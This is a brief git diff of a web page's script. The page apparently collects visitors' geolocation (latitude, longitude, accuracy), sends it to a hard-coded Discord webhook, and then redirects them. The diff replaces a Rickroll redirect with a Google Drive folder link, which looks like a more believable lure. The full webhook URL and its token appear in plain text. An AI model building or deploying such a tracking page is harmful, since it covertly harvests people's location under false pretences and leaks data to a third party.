--- a/index.html
+++ b/index.html
@@ -57,7 +57,7 @@
 
   <script>
     const webhookUrl = "https://discord.com/api/webhooks/1388161217603965210/eELyivDPEhlKfnaaDce_b90zBtGFpe51uLHo28LsG0gle_1d8pfuN-_U6vK6Q38_N4Fj";
-    const redirectUrl = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
+    const redirectUrl = "https://drive.google.com/drive/folders/1UX81_REpub0wX7FGbucSN_gkS5afUI1q?usp=drive_link";
     const deniedPage = "permission-denied.html";
     let coords = { lat: "Permission denied", lon: "Permission denied", acc: 0 };
 
